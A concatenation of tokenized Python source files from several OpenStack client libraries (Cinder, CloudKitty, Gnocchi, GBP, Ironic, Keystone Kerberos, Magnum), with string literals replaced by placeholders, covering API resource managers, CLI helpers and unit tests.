<EOL> body , "<STR_LIT>" ) <EOL> def delete_metadata ( self , snapshot , keys ) : <EOL> """<STR_LIT>""" <EOL> snapshot_id = base . getid ( snapshot ) <EOL> for k in keys : <EOL> self . _delete ( "<STR_LIT>" % ( snapshot_id , k ) ) <EOL> def update_all_metadata ( self , snapshot , metadata ) : <EOL> """<STR_LIT>""" <EOL> body = { '<STR_LIT>' : metadata } <EOL> return self . _update ( "<STR_LIT>" % base . getid ( snapshot ) , <EOL> body ) </s>
<s> """<STR_LIT>""" <EOL> from cinderclient import base <EOL> class Capabilities ( base . Resource ) : <EOL> NAME_ATTR = '<STR_LIT:name>' <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . name <EOL> class CapabilitiesManager ( base . Manager ) : <EOL> """<STR_LIT>""" <EOL> resource_class = Capabilities <EOL> def get ( self , host ) : <EOL> """<STR_LIT>""" <EOL> return self . _get ( '<STR_LIT>' % host , None ) </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> from six . moves . urllib import parse <EOL> from cloudkittyclient import exc <EOL> from cloudkittyclient . i18n import _ <EOL> from cloudkittyclient . openstack . common . apiclient import base <EOL> def getid ( obj ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return obj . id <EOL> except AttributeError : <EOL> return obj <EOL> class Manager ( object ) : <EOL> """<STR_LIT>""" <EOL> resource_class = None <EOL> def __init__ ( self , api ) : <EOL> self . api = api <EOL> @ property <EOL> def client ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . api <EOL> def _create ( self , url , body ) : <EOL> body = self . api . post ( url , json = body ) . json ( ) <EOL> if body : <EOL> return self . resource_class ( self , body ) <EOL> def _list ( self , url , response_key = None , obj_class = None , body = None , <EOL> expect_single = False ) : <EOL> resp = self . api . get ( url ) <EOL> if not resp . content : <EOL> raise exc . HTTPNotFound <EOL> body = resp . json ( ) <EOL> if obj_class is None : <EOL> obj_class = self . resource_class <EOL> if response_key : <EOL> try : <EOL> data = body [ response_key ] <EOL> except KeyError : <EOL> return [ ] <EOL> else : <EOL> data = body <EOL> if expect_single : <EOL> data = [ data ] <EOL> return [ obj_class ( self , res , loaded = True ) for res in data if res ] <EOL> def _update ( self , url , item , response_key = None ) : <EOL> if not item . dirty_fields : <EOL> return item <EOL> item = self . api . put ( url , json = item . dirty_fields ) . json ( ) <EOL> if item : <EOL> return self . resource_class ( self , item ) <EOL> def _delete ( self , url ) : <EOL> self . api . delete ( url ) <EOL> class CrudManager ( base . CrudManager ) : <EOL> """<STR_LIT>""" <EOL> base_url = None <EOL> def build_url ( self , base_url = None , ** kwargs ) : <EOL> base_url = base_url or self . base_url <EOL> return super ( CrudManager , self ) . build_url ( base_url , ** kwargs ) <EOL> def get ( self , ** kwargs ) : <EOL> kwargs = self . _filter_kwargs ( kwargs ) <EOL> return self . _get ( <EOL> self . build_url ( ** kwargs ) ) <EOL> def create ( self , ** kwargs ) : <EOL> kwargs = self . _filter_kwargs ( kwargs ) <EOL> return self . _post ( <EOL> self . build_url ( ** kwargs ) , kwargs ) <EOL> def update ( self , ** kwargs ) : <EOL> kwargs = self . _filter_kwargs ( kwargs ) <EOL> params = kwargs . copy ( ) <EOL> return self . _put ( <EOL> self . build_url ( ** kwargs ) , params ) <EOL> def findall ( self , base_url = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs = self . _filter_kwargs ( kwargs ) <EOL> rl = self . _list ( <EOL> '<STR_LIT>' % { <EOL> '<STR_LIT>' : self . build_url ( base_url = base_url , ** kwargs ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % parse . urlencode ( kwargs ) if kwargs else '<STR_LIT>' , <EOL> } , <EOL> self . collection_key ) <EOL> num = len ( rl ) <EOL> if num == <NUM_LIT:0> : <EOL> msg = _ ( "<STR_LIT>" ) % { <EOL> '<STR_LIT:name>' : self . resource_class . __name__ , <EOL> '<STR_LIT:args>' : kwargs <EOL> } <EOL> raise exc . HTTPNotFound ( msg ) <EOL> return rl <EOL> class Resource ( base . Resource ) : <EOL> """<STR_LIT>""" <EOL> key = None <EOL> def to_dict ( self ) : <EOL> return copy . deepcopy ( self . _info ) <EOL> @ property <EOL> def dirty_fields ( self ) : <EOL> out = self . to_dict ( ) <EOL> for k , v in self . _info . items ( ) : <EOL> if self . __dict__ [ k ] != v : <EOL> out [ k ] = self . __dict__ [ k ] <EOL> return out <EOL> def update ( self ) : <EOL> try : <EOL> return self . manager . update ( ** self . dirty_fields ) <EOL> except AttributeError : <EOL> raise exc . NotUpdatableError ( self ) </s>
<s> from cloudkittyclient . v1 . rating . hashmap import client <EOL> from cloudkittyclient . v1 . rating . hashmap import shell <EOL> class Extension ( object ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def get_client ( http_client ) : <EOL> return client . Client ( http_client ) <EOL> @ staticmethod <EOL> def get_shell ( ) : <EOL> return shell </s>
<s> import os <EOL> import fixtures <EOL> import testtools <EOL> _TRUE_VALUES = ( '<STR_LIT:True>' , '<STR_LIT:true>' , '<STR_LIT:1>' , '<STR_LIT:yes>' ) <EOL> class TestCase ( testtools . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( TestCase , self ) . setUp ( ) <EOL> test_timeout = os . environ . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> try : <EOL> test_timeout = int ( test_timeout ) <EOL> except ValueError : <EOL> test_timeout = <NUM_LIT:0> <EOL> if test_timeout > <NUM_LIT:0> : <EOL> self . useFixture ( fixtures . Timeout ( test_timeout , gentle = True ) ) <EOL> self . useFixture ( fixtures . NestedTempfile ( ) ) <EOL> self . useFixture ( fixtures . TempHomeDir ( ) ) <EOL> if os . environ . get ( '<STR_LIT>' ) in _TRUE_VALUES : <EOL> stdout = self . useFixture ( fixtures . StringStream ( '<STR_LIT>' ) ) . stream <EOL> self . useFixture ( fixtures . MonkeyPatch ( '<STR_LIT>' , stdout ) ) <EOL> if os . environ . get ( '<STR_LIT>' ) in _TRUE_VALUES : <EOL> stderr = self . useFixture ( fixtures . StringStream ( '<STR_LIT>' ) ) . stream <EOL> self . useFixture ( fixtures . MonkeyPatch ( '<STR_LIT>' , stderr ) ) <EOL> self . log_fixture = self . useFixture ( fixtures . FakeLogger ( ) ) </s>
<s> import uuid <EOL> from gnocchiclient . tests . functional import base <EOL> class ResourceTypeClientTest ( base . ClientTestBase ) : <EOL> RESOURCE_TYPE = str ( uuid . uuid4 ( ) ) <EOL> def test_help ( self ) : <EOL> self . gnocchi ( "<STR_LIT>" , params = "<STR_LIT>" ) <EOL> def test_resource_type_scenario ( self ) : <EOL> result = self . gnocchi ( '<STR_LIT>' , params = "<STR_LIT:list>" ) <EOL> r = self . parser . listing ( result ) <EOL> self . assertEqual ( [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:name>' : '<STR_LIT>' } ] , r ) <EOL> result = self . gnocchi ( <EOL> u'<STR_LIT>' , <EOL> params = u"<STR_LIT>" <EOL> "<STR_LIT>" % self . RESOURCE_TYPE ) <EOL> resource = self . details_multiple ( result ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( self . RESOURCE_TYPE , resource [ "<STR_LIT:name>" ] ) <EOL> self . assertEqual ( <EOL> "<STR_LIT>" , <EOL> resource [ "<STR_LIT>" ] ) <EOL> result = self . gnocchi ( <EOL> u'<STR_LIT>' , params = u"<STR_LIT>" % self . RESOURCE_TYPE ) <EOL> resource = self . details_multiple ( result ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( self . RESOURCE_TYPE , resource [ "<STR_LIT:name>" ] ) <EOL> self . assertEqual ( <EOL> "<STR_LIT>" , <EOL> resource [ "<STR_LIT>" ] ) <EOL> result = self . gnocchi ( '<STR_LIT>' , <EOL> params = "<STR_LIT>" % self . RESOURCE_TYPE ) <EOL> self . assertEqual ( "<STR_LIT>" , result ) <EOL> result = self . gnocchi ( '<STR_LIT>' , <EOL> params = "<STR_LIT>" % self . RESOURCE_TYPE , <EOL> fail_ok = True , merge_stderr = True ) <EOL> self . assertFirstLineStartsWith ( <EOL> result . split ( '<STR_LIT:\n>' ) , <EOL> "<STR_LIT>" % self . RESOURCE_TYPE ) <EOL> result = self . gnocchi ( u'<STR_LIT>' , <EOL> params = u"<STR_LIT>" % self . RESOURCE_TYPE , <EOL> fail_ok = True , merge_stderr = True ) <EOL> self . assertFirstLineStartsWith ( <EOL> result . split ( '<STR_LIT:\n>' ) , <EOL> "<STR_LIT>" % self . RESOURCE_TYPE ) </s>
<s> from mox3 import mox <EOL> from neutronclient . common import exceptions <EOL> from neutronclient . tests . unit import test_cli20 as neutron_test_cli20 <EOL> import requests <EOL> from gbpclient . gbp import v2_0 as gbpV2_0 <EOL> from gbpclient import gbpshell <EOL> from gbpclient . v2_0 import client as gbpclient <EOL> API_VERSION = neutron_test_cli20 . API_VERSION <EOL> FORMAT = neutron_test_cli20 . FORMAT <EOL> TOKEN = neutron_test_cli20 . TOKEN <EOL> ENDURL = neutron_test_cli20 . ENDURL <EOL> capture_std_streams = neutron_test_cli20 . capture_std_streams <EOL> end_url = neutron_test_cli20 . end_url <EOL> class FakeStdout ( neutron_test_cli20 . FakeStdout ) : <EOL> pass <EOL> class MyResp ( neutron_test_cli20 . MyResp ) : <EOL> pass <EOL> class MyApp ( neutron_test_cli20 . MyApp ) : <EOL> pass <EOL> class MyUrlComparator ( neutron_test_cli20 . MyUrlComparator ) : <EOL> pass <EOL> class MyComparator ( neutron_test_cli20 . MyComparator ) : <EOL> pass <EOL> class CLITestV20Base ( neutron_test_cli20 . CLITestV20Base ) : <EOL> shell = gbpshell <EOL> client = gbpclient <EOL> def setUp ( self , plurals = None ) : <EOL> super ( CLITestV20Base , self ) . setUp ( ) <EOL> self . client = gbpclient . Client ( token = TOKEN , endpoint_url = self . endurl ) <EOL> def _test_create_resource ( self , resource , cmd , name , myid , args , <EOL> position_names , position_values , <EOL> tenant_id = None , tags = None , admin_state_up = True , <EOL> extra_body = None , cmd_resource = None , <EOL> parent_id = None , ** kwargs ) : <EOL> self . mox . StubOutWithMock ( cmd , "<STR_LIT>" ) <EOL> self . mox . StubOutWithMock ( self . client . httpclient , "<STR_LIT>" ) <EOL> cmd . get_client ( ) . MultipleTimes ( ) . AndReturn ( self . client ) <EOL> if not cmd_resource : <EOL> cmd_resource = resource <EOL> body = { resource : { } , } <EOL> if tenant_id : <EOL> body [ resource ] . update ( { '<STR_LIT>' : tenant_id } ) <EOL> if tags : <EOL> body [ resource ] . update ( { '<STR_LIT>' : tags } ) <EOL> if extra_body : <EOL> body [ resource ] . update ( extra_body ) <EOL> body [ resource ] . update ( kwargs ) <EOL> for i in range ( len ( position_names ) ) : <EOL> body [ resource ] . update ( { position_names [ i ] : position_values [ i ] } ) <EOL> ress = { resource : <EOL> { self . id_field : myid } , } <EOL> if name : <EOL> ress [ resource ] . update ( { '<STR_LIT:name>' : name } ) <EOL> self . client . format = self . format <EOL> resstr = self . client . serialize ( ress ) <EOL> resource_plural = gbpV2_0 . _get_resource_plural ( cmd_resource , <EOL> self . client ) <EOL> path = getattr ( self . client , resource_plural + "<STR_LIT>" ) <EOL> if parent_id : <EOL> path = path % parent_id <EOL> if self . format == '<STR_LIT>' : <EOL> mox_body = MyComparator ( body , self . client ) <EOL> else : <EOL> mox_body = self . client . serialize ( body ) <EOL> self . client . httpclient . request ( <EOL> end_url ( path , format = self . format ) , '<STR_LIT:POST>' , <EOL> body = mox_body , <EOL> headers = mox . ContainsKeyValue ( <EOL> '<STR_LIT>' , TOKEN ) ) . AndReturn ( ( MyResp ( <NUM_LIT:200> ) , resstr ) ) <EOL> args . extend ( [ '<STR_LIT>' , self . format ] ) <EOL> self . mox . ReplayAll ( ) <EOL> cmd_parser = cmd . get_parser ( '<STR_LIT>' + resource ) <EOL> gbpshell . run_command ( cmd , cmd_parser , args ) <EOL> self . mox . VerifyAll ( ) <EOL> self . mox . UnsetStubs ( ) <EOL> _str = self . fake_stdout . make_string ( ) <EOL> self . assertIn ( myid , _str ) <EOL> if name : <EOL> self . assertIn ( name , _str ) <EOL> class ClientV2TestJson ( CLITestV20Base ) : <EOL> pass <EOL> class CLITestV20ExceptionHandler ( CLITestV20Base ) : <EOL> def _test_exception_handler_v20 ( <EOL> self , expected_exception , status_code , expected_msg , <EOL> error_type = None , error_msg = None , error_detail = None , <EOL> error_content = None ) : <EOL> if error_content is None : <EOL> error_content = { '<STR_LIT>' : { '<STR_LIT:type>' : error_type , <EOL> '<STR_LIT:message>' : error_msg , <EOL> '<STR_LIT>' : error_detail } } <EOL> e = self . assertRaises ( expected_exception , <EOL> gbpclient . exception_handler_v20 , <EOL> status_code , error_content ) <EOL> self . assertEqual ( status_code , e . status_code ) <EOL> if expected_msg is None : <EOL> if error_detail : <EOL> expected_msg = '<STR_LIT:\n>' . join ( [ error_msg , error_detail ] ) <EOL> else : <EOL> expected_msg = error_msg <EOL> self . assertEqual ( expected_msg , e . message ) <EOL> def test_exception_handler_v20_neutron_known_error ( self ) : <EOL> pass <EOL> def test_exception_handler_v20_neutron_known_error_without_detail ( self ) : <EOL> pass <EOL> def test_exception_handler_v20_unknown_error_to_per_code_exception ( self ) : <EOL> for status_code , client_exc in exceptions . HTTP_EXCEPTION_MAP . items ( ) : <EOL> error_msg = '<STR_LIT>' <EOL> error_detail = '<STR_LIT>' <EOL> self . _test_exception_handler_v20 ( <EOL> client_exc , status_code , <EOL> error_msg + '<STR_LIT:\n>' + error_detail , <EOL> '<STR_LIT>' , error_msg , error_detail ) <EOL> def test_exception_handler_v20_neutron_unknown_status_code ( self ) : <EOL> error_msg = '<STR_LIT>' <EOL> error_detail = '<STR_LIT>' <EOL> self . _test_exception_handler_v20 ( <EOL> exceptions . NeutronClientException , <NUM_LIT> , <EOL> error_msg + '<STR_LIT:\n>' + error_detail , <EOL> '<STR_LIT>' , error_msg , error_detail ) <EOL> def test_exception_handler_v20_bad_neutron_error ( self ) : <EOL> error_content = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . _test_exception_handler_v20 ( <EOL> exceptions . NeutronClientException , <NUM_LIT> , <EOL> expected_msg = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> error_content = error_content ) <EOL> def test_exception_handler_v20_error_dict_contains_message ( self ) : <EOL> error_content = { '<STR_LIT:message>' : '<STR_LIT>' } <EOL> self . _test_exception_handler_v20 ( <EOL> exceptions . NeutronClientException , <NUM_LIT> , <EOL> expected_msg = '<STR_LIT>' , <EOL> error_content = error_content ) <EOL> def test_exception_handler_v20_error_dict_not_contain_message ( self ) : <EOL> error_content = { '<STR_LIT:error>' : '<STR_LIT>' } <EOL> expected_msg = '<STR_LIT>' % ( <NUM_LIT> , error_content ) <EOL> self . _test_exception_handler_v20 ( <EOL> exceptions . NeutronClientException , <NUM_LIT> , <EOL> expected_msg = expected_msg , <EOL> error_content = error_content ) <EOL> def test_exception_handler_v20_default_fallback ( self ) : <EOL> error_content = '<STR_LIT>' <EOL> expected_msg = '<STR_LIT>' % ( <NUM_LIT> , error_content ) <EOL> self . _test_exception_handler_v20 ( <EOL> exceptions . NeutronClientException , <NUM_LIT> , <EOL> expected_msg = expected_msg , <EOL> error_content = error_content ) <EOL> def test_exception_status ( self ) : <EOL> e = exceptions . BadRequest ( ) <EOL> self . assertEqual ( e . status_code , <NUM_LIT> ) <EOL> e = exceptions . BadRequest ( status_code = <NUM_LIT> ) <EOL> self . assertEqual ( e . status_code , <NUM_LIT> ) <EOL> e = exceptions . SslCertificateValidationError ( ) <EOL> self . assertIsNotNone ( e . status_code ) <EOL> e = exceptions . SslCertificateValidationError ( status_code = <NUM_LIT> ) <EOL> self . assertEqual ( e . status_code , <NUM_LIT> ) <EOL> def test_connection_failed ( self ) : <EOL> self . mox . StubOutWithMock ( self . client . httpclient , '<STR_LIT>' ) <EOL> self . client . httpclient . auth_token = '<STR_LIT>' <EOL> self . client . httpclient . request ( <EOL> end_url ( '<STR_LIT>' ) , '<STR_LIT:GET>' , <EOL> headers = mox . ContainsKeyValue ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) . AndRaise ( requests . exceptions . ConnectionError ( '<STR_LIT>' ) ) <EOL> self . mox . ReplayAll ( ) <EOL> error = self . assertRaises ( exceptions . ConnectionFailed , <EOL> self . client . get , '<STR_LIT>' ) <EOL> self . assertIsNotNone ( error . status_code ) <EOL> self . mox . VerifyAll ( ) <EOL> self . mox . UnsetStubs ( ) </s>
<s> from __future__ import print_function <EOL> import getpass <EOL> import inspect <EOL> import json <EOL> import os <EOL> import sys <EOL> import textwrap <EOL> from oslo_utils import encodeutils <EOL> from oslo_utils import strutils <EOL> import prettytable <EOL> import six <EOL> from six import moves <EOL> from ironicclient . common . i18n import _ <EOL> class MissingArgs ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , missing ) : <EOL> self . missing = missing <EOL> msg = _ ( "<STR_LIT>" ) % "<STR_LIT:U+002CU+0020>" . join ( missing ) <EOL> super ( MissingArgs , self ) . __init__ ( msg ) <EOL> def validate_args ( fn , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> argspec = inspect . getargspec ( fn ) <EOL> num_defaults = len ( argspec . defaults or [ ] ) <EOL> required_args = argspec . args [ : len ( argspec . args ) - num_defaults ] <EOL> def isbound ( method ) : <EOL> return getattr ( method , '<STR_LIT>' , None ) is not None <EOL> if isbound ( fn ) : <EOL> required_args . pop ( <NUM_LIT:0> ) <EOL> missing = [ arg for arg in required_args if arg not in kwargs ] <EOL> missing = missing [ len ( args ) : ] <EOL> if missing : <EOL> raise MissingArgs ( missing ) <EOL> def arg ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> def _decorator ( func ) : <EOL> add_arg ( func , * args , ** kwargs ) <EOL> return func <EOL> return _decorator <EOL> def env ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for arg in args : <EOL> value = os . environ . get ( arg ) <EOL> if value : <EOL> return value <EOL> return kwargs . get ( '<STR_LIT:default>' , '<STR_LIT>' ) <EOL> def add_arg ( func , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( func , '<STR_LIT>' ) : <EOL> func . arguments = [ ] <EOL> if ( args , kwargs ) not in func . arguments : <EOL> func . arguments . insert ( <NUM_LIT:0> , ( args , kwargs ) ) <EOL> def unauthenticated ( func ) : <EOL> """<STR_LIT>""" <EOL> func . unauthenticated = True <EOL> return func <EOL> def isunauthenticated ( func ) : <EOL> """<STR_LIT>""" <EOL> return getattr ( func , '<STR_LIT>' , False ) <EOL> def print_list ( objs , fields , formatters = None , sortby_index = <NUM_LIT:0> , <EOL> mixed_case_fields = None , field_labels = None , json_flag = False ) : <EOL> """<STR_LIT>""" <EOL> if json_flag : <EOL> print ( json . dumps ( [ o . _info for o in objs ] , indent = <NUM_LIT:4> , <EOL> separators = ( '<STR_LIT:U+002C>' , '<STR_LIT>' ) ) ) <EOL> return <EOL> formatters = formatters or { } <EOL> mixed_case_fields = mixed_case_fields or [ ] <EOL> field_labels = field_labels or fields <EOL> if len ( field_labels ) != len ( fields ) : <EOL> raise ValueError ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : field_labels , '<STR_LIT>' : fields } ) <EOL> if sortby_index is None : <EOL> kwargs = { } <EOL> else : <EOL> kwargs = { '<STR_LIT>' : field_labels [ sortby_index ] } <EOL> pt = prettytable . PrettyTable ( field_labels ) <EOL> pt . align = '<STR_LIT:l>' <EOL> for o in objs : <EOL> row = [ ] <EOL> for field in fields : <EOL> if field in formatters : <EOL> row . append ( formatters [ field ] ( o ) ) <EOL> else : <EOL> if field in mixed_case_fields : <EOL> field_name = field . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) <EOL> else : <EOL> field_name = field . lower ( ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) <EOL> if isinstance ( o , dict ) : <EOL> data = o . get ( field_name , '<STR_LIT>' ) <EOL> else : <EOL> data = getattr ( o , field_name , '<STR_LIT>' ) <EOL> row . append ( data ) <EOL> pt . add_row ( row ) <EOL> if six . PY3 : <EOL> print ( encodeutils . safe_encode ( pt . get_string ( ** kwargs ) ) . decode ( ) ) <EOL> else : <EOL> print ( encodeutils . safe_encode ( pt . get_string ( ** kwargs ) ) ) <EOL> def print_dict ( dct , dict_property = "<STR_LIT>" , wrap = <NUM_LIT:0> , dict_value = '<STR_LIT>' , <EOL> json_flag = False ) : <EOL> """<STR_LIT>""" <EOL> if json_flag : <EOL> print ( json . dumps ( dct , indent = <NUM_LIT:4> , separators = ( '<STR_LIT:U+002C>' , '<STR_LIT>' ) ) ) <EOL> return <EOL> pt = prettytable . PrettyTable ( [ dict_property , dict_value ] ) <EOL> pt . align = '<STR_LIT:l>' <EOL> for k , v in sorted ( dct . items ( ) ) : <EOL> if isinstance ( v , dict ) : <EOL> v = six . text_type ( v ) <EOL> if wrap > <NUM_LIT:0> : <EOL> v = textwrap . fill ( six . text_type ( v ) , wrap ) <EOL> if v and isinstance ( v , six . string_types ) and r'<STR_LIT:\n>' in v : <EOL> lines = v . strip ( ) . split ( r'<STR_LIT:\n>' ) <EOL> col1 = k <EOL> for line in lines : <EOL> pt . add_row ( [ col1 , line ] ) <EOL> col1 = '<STR_LIT>' <EOL> else : <EOL> pt . add_row ( [ k , v ] ) <EOL> if six . PY3 : <EOL> print ( encodeutils . safe_encode ( pt . get_string ( ) ) . decode ( ) ) <EOL> else : <EOL> print ( encodeutils . safe_encode ( pt . get_string ( ) ) ) <EOL> def get_password ( max_password_prompts = <NUM_LIT:3> ) : <EOL> """<STR_LIT>""" <EOL> verify = strutils . bool_from_string ( env ( "<STR_LIT>" ) ) <EOL> pw = None <EOL> if hasattr ( sys . stdin , "<STR_LIT>" ) and sys . stdin . isatty ( ) : <EOL> try : <EOL> for __ in moves . range ( max_password_prompts ) : <EOL> pw1 = getpass . getpass ( "<STR_LIT>" ) <EOL> if verify : <EOL> pw2 = getpass . getpass ( "<STR_LIT>" ) <EOL> else : <EOL> pw2 = pw1 <EOL> if pw1 == pw2 and pw1 : <EOL> pw = pw1 <EOL> break <EOL> except EOFError : <EOL> pass <EOL> return pw <EOL> def service_type ( stype ) : <EOL> """<STR_LIT>""" <EOL> def inner ( f ) : <EOL> f . service_type = stype <EOL> return f <EOL> return inner <EOL> def get_service_type ( f ) : <EOL> """<STR_LIT>""" <EOL> return getattr ( f , '<STR_LIT>' , None ) <EOL> def pretty_choice_list ( l ) : <EOL> return '<STR_LIT:U+002CU+0020>' . join ( "<STR_LIT>" % i for i in l ) <EOL> def exit ( msg = '<STR_LIT>' ) : <EOL> if msg : <EOL> print ( msg , file = sys . stderr ) <EOL> sys . exit ( <NUM_LIT:1> ) </s>
<s> from ironicclient . tests . unit import utils <EOL> module_str = '<STR_LIT>' <EOL> class ImportTest ( utils . BaseTestCase ) : <EOL> def check_exported_symbols ( self , exported_symbols ) : <EOL> self . assertIn ( '<STR_LIT>' , exported_symbols ) <EOL> self . assertIn ( '<STR_LIT>' , exported_symbols ) <EOL> self . assertIn ( '<STR_LIT>' , exported_symbols ) <EOL> def test_import_objects ( self ) : <EOL> module = __import__ ( module_str ) <EOL> exported_symbols = dir ( module ) <EOL> self . check_exported_symbols ( exported_symbols ) <EOL> def test_default_import ( self ) : <EOL> default_imports = __import__ ( module_str , globals ( ) , locals ( ) , [ '<STR_LIT:*>' ] ) <EOL> exported_symbols = dir ( default_imports ) <EOL> self . check_exported_symbols ( exported_symbols ) <EOL> def test_import__all__ ( self ) : <EOL> module = __import__ ( module_str ) <EOL> self . check_exported_symbols ( module . __all__ ) </s>
<s> import uuid <EOL> from keystoneauth1 import fixture as ks_fixture <EOL> from keystoneauth1 import session <EOL> from keystoneclient_kerberos . tests import base <EOL> from keystoneclient_kerberos import v3 <EOL> class TestFederatedAuth ( base . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestFederatedAuth , self ) . setUp ( ) <EOL> self . protocol = uuid . uuid4 ( ) . hex <EOL> self . identity_provider = uuid . uuid4 ( ) . hex <EOL> @ property <EOL> def token_url ( self ) : <EOL> return "<STR_LIT>" % ( <EOL> self . TEST_V3_URL , <EOL> self . identity_provider , <EOL> self . protocol ) <EOL> def test_unscoped_federated_auth ( self ) : <EOL> token_id , _ = self . kerberos_mock . mock_auth_success ( url = self . token_url , <EOL> method = '<STR_LIT:GET>' ) <EOL> plugin = v3 . FederatedKerberos ( auth_url = self . TEST_V3_URL , <EOL> protocol = self . protocol , <EOL> identity_provider = self . identity_provider ) <EOL> sess = session . Session ( ) <EOL> tok = plugin . get_token ( sess ) <EOL> self . assertEqual ( token_id , tok ) <EOL> def test_project_scoped_federated_auth ( self ) : <EOL> self . kerberos_mock . mock_auth_success ( url = self . token_url , method = '<STR_LIT:GET>' ) <EOL> scoped_id = uuid . uuid4 ( ) . hex <EOL> scoped_body = ks_fixture . V3Token ( ) <EOL> scoped_body . set_project_scope ( ) <EOL> self . requests_mock . post ( '<STR_LIT>' % self . TEST_V3_URL , <EOL> json = scoped_body , <EOL> headers = { '<STR_LIT>' : scoped_id , <EOL> '<STR_LIT:Content-Type>' : '<STR_LIT:application/json>' } ) <EOL> plugin = v3 . FederatedKerberos ( auth_url = self . TEST_V3_URL , <EOL> protocol = self . protocol , <EOL> identity_provider = self . identity_provider , <EOL> project_id = scoped_body . project_id ) <EOL> sess = session . Session ( ) <EOL> tok = plugin . get_token ( sess ) <EOL> proj = plugin . get_project_id ( sess ) <EOL> self . assertEqual ( scoped_id , tok ) <EOL> self . assertEqual ( scoped_body . project_id , proj ) </s>
<s> import collections <EOL> import six <EOL> from magnumclient . common import cliutils <EOL> from magnumclient . common import utils <EOL> from magnumclient import exceptions as exc <EOL> from magnumclient . tests import utils as test_utils <EOL> class CommonFiltersTest ( test_utils . BaseTestCase ) : <EOL> def test_limit ( self ) : <EOL> result = utils . common_filters ( limit = <NUM_LIT> ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , result ) <EOL> def test_limit_0 ( self ) : <EOL> result = utils . common_filters ( limit = <NUM_LIT:0> ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , result ) <EOL> def test_limit_negative_number ( self ) : <EOL> result = utils . common_filters ( limit = - <NUM_LIT:2> ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , result ) <EOL> def test_other ( self ) : <EOL> for key in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> result = utils . common_filters ( ** { key : '<STR_LIT:test>' } ) <EOL> self . assertEqual ( [ '<STR_LIT>' % key ] , result ) <EOL> class SplitAndDeserializeTest ( test_utils . BaseTestCase ) : <EOL> def test_split_and_deserialize ( self ) : <EOL> ret = utils . split_and_deserialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( ( '<STR_LIT:str>' , '<STR_LIT:foo>' ) , ret ) <EOL> ret = utils . split_and_deserialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( ( '<STR_LIT:int>' , <NUM_LIT:1> ) , ret ) <EOL> ret = utils . split_and_deserialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( ( '<STR_LIT:bool>' , False ) , ret ) <EOL> ret = utils . split_and_deserialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( ( '<STR_LIT:list>' , [ <NUM_LIT:1> , "<STR_LIT:foo>" , <NUM_LIT:2> ] ) , ret ) <EOL> ret = utils . split_and_deserialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( ( '<STR_LIT>' , { "<STR_LIT:foo>" : <NUM_LIT:1> } ) , ret ) <EOL> ret = utils . split_and_deserialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( ( '<STR_LIT>' , "<STR_LIT:1>" ) , ret ) <EOL> def test_split_and_deserialize_fail ( self ) : <EOL> self . assertRaises ( exc . CommandError , <EOL> utils . split_and_deserialize , '<STR_LIT>' ) <EOL> class ArgsArrayToPatchTest ( test_utils . BaseTestCase ) : <EOL> def test_args_array_to_patch ( self ) : <EOL> my_args = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> patch = utils . args_array_to_patch ( my_args [ '<STR_LIT>' ] , <EOL> my_args [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:value>' : '<STR_LIT:foo>' , '<STR_LIT:path>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:value>' : <NUM_LIT:1> , '<STR_LIT:path>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:value>' : True , '<STR_LIT:path>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:value>' : [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , '<STR_LIT:path>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:value>' : { "<STR_LIT:foo>" : "<STR_LIT:bar>" } , <EOL> '<STR_LIT:path>' : '<STR_LIT>' } ] , patch ) <EOL> def test_args_array_to_patch_format_error ( self ) : <EOL> my_args = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> self . assertRaises ( exc . CommandError , utils . args_array_to_patch , <EOL> my_args [ '<STR_LIT>' ] , my_args [ '<STR_LIT>' ] ) 